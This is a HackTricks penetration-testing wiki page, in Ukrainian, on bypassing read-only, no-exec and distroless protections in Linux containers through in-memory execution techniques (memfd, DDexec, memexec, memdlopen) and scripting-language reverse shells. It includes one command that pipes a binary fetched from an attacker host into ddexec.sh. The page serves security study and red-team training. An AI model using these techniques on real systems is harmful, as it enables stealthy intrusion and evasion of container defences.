HackTricksBypass FS protections: read-only / no-exec / Distroless
Reading time: 6 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Videos
У наступних відео ви можете знайти техніки, згадані на цій сторінці, пояснені більш детально:
- DEF CON 31 - Exploring Linux Memory Manipulation for Stealth and Evasion
- Stealth intrusions with DDexec-ng & in-memory dlopen() - HackTricks Track 2023
read-only / no-exec scenario
Все частіше можна зустріти linux-машини, змонтовані з read-only (ro) file system protection, особливо в контейнерах. Це пов'язано з тим, що запустити контейнер з ro файловою системою так само просто, як встановити readOnlyRootFilesystem: true у securitycontext:
apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
readOnlyRootFilesystem: true
command: ["sh", "-c", "while true; do sleep 1000; done"]
Однак, навіть якщо файлова система змонтована як ro, /dev/shm все ще буде записуваним, тому це неправда, що ми не можемо нічого записати на диск. Проте, ця папка буде змонтована з no-exec protection, тому якщо ви завантажите бінарний файл сюди, ви не зможете його виконати.
warning
З точки зору червоної команди, це ускладнює завантаження та виконання бінарних файлів, які вже не знаходяться в системі (як бекдори або енумератори, такі як kubectl).
Easiest bypass: Scripts
Зверніть увагу, що я згадував бінарні файли, ви можете виконати будь-який скрипт, якщо інтерпретатор знаходиться всередині машини, наприклад, shell script, якщо sh присутній, або python script, якщо python встановлений.
Однак цього недостатньо, щоб виконати ваш бінарний бекдор або інші бінарні інструменти, які вам можуть знадобитися.
Memory Bypasses
Якщо ви хочете виконати бінарний файл, але файлова система цього не дозволяє, найкращий спосіб зробити це - виконати його з пам'яті, оскільки захисти не застосовуються там.
FD + exec syscall bypass
Якщо у вас є потужні скриптові движки всередині машини, такі як Python, Perl або Ruby, ви можете завантажити бінарний файл для виконання з пам'яті, зберегти його в дескрипторі пам'яті (create_memfd syscall), який не буде захищений цими захистами, а потім викликати exec syscall, вказуючи fd як файл для виконання.
Для цього ви можете легко використовувати проект fileless-elf-exec. Ви можете передати йому бінарний файл, і він згенерує скрипт у вказаній мові з бінарним файлом, стиснутим і b64 закодованим з інструкціями для декодування та розпакування його в fd, створеному за допомогою виклику create_memfd syscall, і викликом exec syscall для його виконання.
warning
Це не працює в інших скриптових мовах, таких як PHP або Node, оскільки у них немає жодного за замовчуванням способу викликати сирі syscalls з скрипту, тому неможливо викликати create_memfd, щоб створити memory fd для зберігання бінарного файлу.
Більше того, створення звичайного fd з файлом у /dev/shm не спрацює, оскільки вам не дозволять його виконати, оскільки no-exec protection буде застосовуватися.
DDexec / EverythingExec
DDexec / EverythingExec - це техніка, яка дозволяє вам модифікувати пам'ять вашого власного процесу, перезаписуючи його /proc/self/mem.
Отже, контролюючи асемблерний код, який виконується процесом, ви можете написати shellcode і "мутувати" процес, щоб виконати будь-який довільний код.
tip
DDexec / EverythingExec дозволить вам завантажити та виконати ваш власний shellcode або будь-який бінарний файл з пам'яті.
# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
Для отримання додаткової інформації про цю техніку перевірте Github або:
MemExec
Memexec є природним наступним кроком DDexec. Це DDexec shellcode demonised, тому що щоразу, коли ви хочете запустити інший бінарний файл, вам не потрібно перезапускати DDexec, ви можете просто запустити shellcode memexec за допомогою техніки DDexec, а потім спілкуватися з цим демоном, щоб передати нові бінарні файли для завантаження та виконання.
Ви можете знайти приклад того, як використовувати memexec для виконання бінарних файлів з PHP реверс-шелу за адресою https://github.com/arget13/memexec/blob/main/a.php.
Memdlopen
З подібною метою до DDexec, техніка memdlopen дозволяє легше завантажувати бінарні файли в пам'ять для подальшого виконання. Це може навіть дозволити завантажувати бінарні файли з залежностями.
Distroless Bypass
Що таке distroless
Контейнери distroless містять лише найнеобхідні компоненти для запуску конкретного застосунку або служби, такі як бібліотеки та залежності виконання, але виключають більші компоненти, такі як менеджер пакетів, оболонка або системні утиліти.
Мета контейнерів distroless полягає в тому, щоб зменшити поверхню атаки контейнерів, усунувши непотрібні компоненти та мінімізуючи кількість вразливостей, які можуть бути використані.
Реверс-шел
У контейнері distroless ви, можливо, навіть не знайдете sh або bash для отримання звичайної оболонки. Ви також не знайдете бінарні файли, такі як ls, whoami, id... все, що ви зазвичай запускаєте в системі.
warning
Тому ви не зможете отримати реверс-шел або перерахувати систему, як зазвичай.
Однак, якщо скомпрометований контейнер, наприклад, запускає flask web, тоді python встановлений, і тому ви можете отримати Python реверс-шел. Якщо він запускає node, ви можете отримати Node rev shell, і те ж саме з більшістю будь-якої скриптової мови.
tip
Використовуючи скриптову мову, ви могли б перерахувати систему, використовуючи можливості мови.
Якщо немає захистів read-only/no-exec, ви могли б зловживати своїм реверс-шелом, щоб записувати у файлову систему свої бінарні файли та виконувати їх.
tip
Однак у таких контейнерах ці захисти зазвичай існують, але ви могли б використовувати попередні техніки виконання в пам'яті, щоб обійти їх.
Ви можете знайти приклади того, як використовувати деякі вразливості RCE для отримання реверс-шелів скриптових мов та виконання бінарних файлів з пам'яті за адресою https://github.com/carlospolop/DistrolessRCE.
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.